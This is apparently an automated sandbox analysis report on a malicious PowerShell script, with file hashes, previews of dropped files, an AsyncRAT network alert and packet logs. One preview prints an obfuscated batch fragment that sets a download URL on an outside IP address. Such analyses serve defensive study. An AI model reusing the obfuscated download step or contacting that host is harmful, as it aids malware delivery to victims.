                                                                        Size (bytes):9728
                                                                        Entropy (8bit):4.629818251838896
                                                                        Encrypted:false
                                                                        SSDEEP:192:CRH6HN4QhfNQ8q8888yYAdsNRjOaiGUxRa95MqBY3eN45p:lNxNU9O0+a95MqXS5p
                                                                        MD5:C66459383FB23827E8B9123EE883D123
                                                                        SHA1:9CB50F60313E7F8E1C8BBA2C6387DD06095AEF06
                                                                        SHA-256:5249037B73A7B886E99BFD906BEDE7EAA38E97BC615C2FF9BAA383FF9AF34D6C
                                                                        SHA-512:F8F06A17A97C494AA9AFB690663A85002498F62DB9D923386AF69FDC60AC84C7A1F65555FD0D7952D1C9CB10D5083E0CA181031B7811EF2E17177EFDA2667518
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|g...........!.................<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................<......H........%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..:........e...+X......YE................................................+....+....,..?.+...+...+......X...2...8..............................(....(....}....~....r...pr...p~....~..... ....~.........o3.......-.s....z..<
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                        Category:modified
                                                                        Size (bytes):713
                                                                        Entropy (8bit):5.248611842774615
                                                                        Encrypted:false
                                                                        SSDEEP:12:KO2z/IR37L/6K2aD50taDDuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOuIdn6K2aDGaDDuKax5DqBVKVrdFAMb
                                                                        MD5:BDF7D8842402CC6B699CDF49B91798AE
                                                                        SHA1:BD876325E8DE62E1DD270CAD4687C0CAE415CA95
                                                                        SHA-256:5549E8A07DCE05216A78A71F2524E5CA78A2B8F024FD6D133DF29E5373490A35
                                                                        SHA-512:D216FCC33A09C1648713409D29ECBA35D8AC70477E05AF1B99CAB239044748CBFDFCF69CB5D3EB2BFDBDED829D45B9AC61D457446872778D86A682D7A103D639
                                                                        Malicious:false
                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6224
                                                                        Entropy (8bit):3.7305004495106315
                                                                        Encrypted:false
                                                                        SSDEEP:96:1YPvm1I76X3CEJTWkvhkvCCtSe8mXeEHNe8mXe7H5:aP+1I76ZJeSe8mje8m+
                                                                        MD5:354CB311ED1BBD4A7D146398FD553C01
                                                                        SHA1:9C8B24992BCD1BA379BDADC98DBE56ECBAD733BE
                                                                        SHA-256:00B7AB02CACC8EF1B72B9B3B8BEBB13FD1FCB4E25F12D9351650375E37561896
                                                                        SHA-512:CF192DFCA0C5BA370C0FA5E10DAC6B9D185410027B4AD559EAD67FCEB9BB9EEEEB611396E6B245B68008580913EBFABA211CA3603DFE825CB15CA8A0E0F25E1B
                                                                        Malicious:false
                                                                        Preview:...................................FL..................F.".. ...J.S........`..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....Vd..`..Ur...`......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2'Z{)...........................^.A.p.p.D.a.t.a...B.V.1.....'Zy)..Roaming.@......EW<2'Zy)..../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2'Zv)....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2'Zv)....2.....................K.,.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2'Zv)....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2'Zv)....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2'Z|)....u...........
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6224
                                                                        Entropy (8bit):3.7305004495106315
                                                                        Encrypted:false
                                                                        SSDEEP:96:1YPvm1I76X3CEJTWkvhkvCCtSe8mXeEHNe8mXe7H5:aP+1I76ZJeSe8mje8m+
                                                                        MD5:354CB311ED1BBD4A7D146398FD553C01
                                                                        SHA1:9C8B24992BCD1BA379BDADC98DBE56ECBAD733BE
                                                                        SHA-256:00B7AB02CACC8EF1B72B9B3B8BEBB13FD1FCB4E25F12D9351650375E37561896
                                                                        SHA-512:CF192DFCA0C5BA370C0FA5E10DAC6B9D185410027B4AD559EAD67FCEB9BB9EEEEB611396E6B245B68008580913EBFABA211CA3603DFE825CB15CA8A0E0F25E1B
                                                                        Malicious:false
                                                                        Preview:...................................FL..................F.".. ...J.S........`..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....Vd..`..Ur...`......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2'Z{)...........................^.A.p.p.D.a.t.a...B.V.1.....'Zy)..Roaming.@......EW<2'Zy)..../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2'Zv)....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2'Zv)....2.....................K.,.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2'Zv)....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2'Zv)....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2'Z|)....u...........
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Windows\Temp\Pack.bat>), ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):58
                                                                        Entropy (8bit):4.998079219594343
                                                                        Encrypted:false
                                                                        SSDEEP:3:HRAbABGQYm5sMsgMy:HRYFVmyMsa
                                                                        MD5:5B6B8EB0E51D10345B17687D8787296C
                                                                        SHA1:18FD419CAB714D84390DF0D50FEABF787CB0CC98
                                                                        SHA-256:27828C60AE9EC5AC624B3B607EA6255FCC246CB15F682A425EA6BFABB4D90054
                                                                        SHA-512:98AF1DE5BC03241078284609ED96EB4213844CA2666398D6D6CD322B9792615C6FC5FFA46DA53AE0EEB13DD8F8056483E0895E497DE3BF9DDD532A9DFFE00145
                                                                        Malicious:true
                                                                        Preview:[InternetShortcut]..URL=file:///C:\Windows\Temp\Pack.bat..
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (1207), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):5984
                                                                        Entropy (8bit):4.225503054935712
                                                                        Encrypted:false
                                                                        SSDEEP:48:eJhMTK/9b0XlysmioVJvPxHTceFed5/r9ZbBA2K3y:e2/WHHVTM5/r9RB/
                                                                        MD5:380F7A432A6528223C05A2D48990827C
                                                                        SHA1:EA7D06B5ACDA2F1AFACD348FE64454FADAA4ECE4
                                                                        SHA-256:CB6AAA288E92A75B77120F5996CDDACF5374C5FCC3679F942554D52F740149C6
                                                                        SHA-512:CF16E64182CAB9F2ECF9AE4351BE69D0BCE0833973F2071DF76E1061CDA9128C54392FFDE006C64D41F4C26D3086CDCC85EA0410ECB29887F72F40DB33A0C803
                                                                        Malicious:true
                                                                        Preview:@%.U.`....t.%e%.U.`....%c%.U.`....%h%.U.`....%o%.U.`....% %.U.`....%o%.U.`....%f%.U.`....%f%.U.`....%..s%.U.`....%e%.U.`....%t%.U.`....%l%.U.`....%o%.U.`....%c%.U.`....%a%.U.`....%l%.U.`....%....s%.U.`....%e%.U.`....%t%.U.`....% %.U.`....%"%.U.`....%u%.U.`....%r%.U.`....%l%.U.`....%=%.U.`....%h%.U.`....%t%.U.`....%t%.U.`....%p%.U.`....%:%.U.`....%/%.U.`....%/%.U.`....%1%.U.`....%4%.U.`....%7%.U.`....%.%.U.`....%4%.U.`....%5%.U.`....%.%.U.`....%4%.U.`....%4%.U.`....%.%.U.`....%1%.U.`....%3%.U.`....%1%.U.`....%/%.U.`....%i%.U.`....%n%.U.`....%f%.U.`....%o%.U.`....%p%.U.`....%a%
                                                                        File type:ASCII text, with very long lines (4722), with CRLF line terminators
                                                                        Entropy (8bit):6.023619471457944
                                                                        TrID:
                                                                          File name:sfqbr.ps1
                                                                          File size:22'030 bytes
                                                                          MD5:524fca1eea0f55f1ad6281325664dcb4
                                                                          SHA1:fa39a3bb823909c0294804a32303378ac25e0492
                                                                          SHA256:b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff
                                                                          SHA512:a8002af2535c7fa629b7375943ade44f36fe0b76ccc324ab35d09e96931f7e5fc82c88787a423ae96ad58d2683f870693edb6f5cbafdd4b6576f3d1a09ff24b2
                                                                          SSDEEP:384:zIAXUpjxl+K++gtu0P1GUK++qUpjxl6Upjxl+mATyK++IcmATpPsPWmATEP9rPva:zIAMVl+7+gbh7+3VlnVliTy7+IITJqKh
                                                                          TLSH:E6A28E7B91C070C77FAE7B505BF7ADD7BAF2143E619820EC6965C132932B84890091E3
                                                                          File Content Preview:..$bOsBLnF01BPxR9RknSeWAIgbb7gxSd6nQvaaz0Dd3Mx1t9NLL2WsCToSrQjNHShYFlhfi0uwOBdxUosctUlaGOl6HHsiQzVkpZwHcrnVHjdB008DhHewqHS0AlYaILfZp2I52l9BrQSgukFQJpBJUi4hG5H1TNM5EDV7sCL6HdFZyvGafIQcKWEH8ky6eIseDWcrOHhGeFB1cesVzqVK6uvr8O9HOOc8vlVcTZLXkJ8EVNod1dGxxhhTlvsA
                                                                          Icon Hash:3270d6baae77db44
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2025-01-07T06:12:10.576354+01002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)194.130.22.614449192.168.2.649742TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 7, 2025 06:11:58.752806902 CET4970980192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:11:58.757693052 CET8049709147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:11:58.757781029 CET4970980192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:11:58.761396885 CET4970980192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:11:58.766189098 CET8049709147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:11:59.393201113 CET8049709147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:11:59.393217087 CET8049709147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:11:59.393228054 CET8049709147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:11:59.393238068 CET8049709147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:11:59.393250942 CET8049709147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:11:59.393260002 CET8049709147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:11:59.393280029 CET4970980192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:11:59.393340111 CET4970980192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:11:59.560120106 CET4970980192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:11:59.757971048 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:11:59.763978004 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:11:59.764043093 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:11:59.766478062 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:11:59.771419048 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.416176081 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.416213036 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.416224003 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.416234970 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.416244984 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.416254997 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.416265965 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.416276932 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.416287899 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.416299105 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.416352987 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:00.416400909 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:00.421998978 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.422010899 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.422086954 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:00.506759882 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.506778002 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.506788015 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.506798983 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.506850958 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:00.507080078 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.507112980 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.507199049 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:00.507426977 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.507437944 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.507448912 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:00.507473946 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:00.555099964 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.052222013 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.057188988 CET8049710147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.057240963 CET4971080192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.241864920 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.246810913 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.246876001 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.247064114 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.251801014 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.892477036 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.892502069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.892524958 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.892535925 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.892546892 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.892556906 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.892563105 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.892569065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.892566919 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.892579079 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.892591000 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.892611027 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.892611027 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.892636061 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.892636061 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.897439003 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.897463083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.897551060 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.984688997 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.984709024 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.984720945 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.984889030 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.984900951 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.984903097 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.984913111 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.984924078 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.984931946 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.984936953 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.984954119 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.985038042 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.985716105 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.985734940 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.985745907 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.985755920 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.985765934 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.985790968 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.985817909 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.986608982 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.986624956 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.986635923 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.986645937 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.986656904 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:02.986674070 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.986742020 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:02.987353086 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:03.133445024 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.393440962 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.398391962 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.580173016 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.580188036 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.580229998 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.580240011 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.580240965 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.580252886 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.580279112 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.580313921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.580324888 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.580336094 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.580354929 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.580358982 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.580383062 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.581221104 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.581232071 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.581242085 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.581269026 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.581296921 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.668971062 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669012070 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669023991 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669034004 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669044971 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669116974 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.669239998 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669250965 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669261932 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669285059 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.669297934 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.669637918 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669648886 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669661045 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669672012 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669682980 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.669682980 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.669704914 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.670180082 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670197964 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670208931 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670218945 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670228958 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670232058 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.670260906 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.670820951 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670831919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670842886 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670876026 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670885086 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670886040 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.670897961 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670903921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.670923948 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.670933008 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.757987976 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758017063 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758028984 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758039951 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758050919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758069992 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.758100986 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.758156061 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758176088 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758187056 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758219957 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.758230925 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758239031 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.758243084 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758302927 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.758678913 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758690119 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758702993 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758713961 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758728027 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758738995 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758744955 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.758749962 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.758764029 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.758784056 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.759239912 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759252071 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759262085 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759289980 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.759322882 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.759363890 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759382010 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759393930 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759428024 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.759473085 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759483099 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759494066 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759511948 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.759531975 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.759577036 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759589911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759601116 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759612083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.759633064 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.759639978 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:04.760329962 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:04.761151075 CET8049712147.45.44.131192.168.2.6
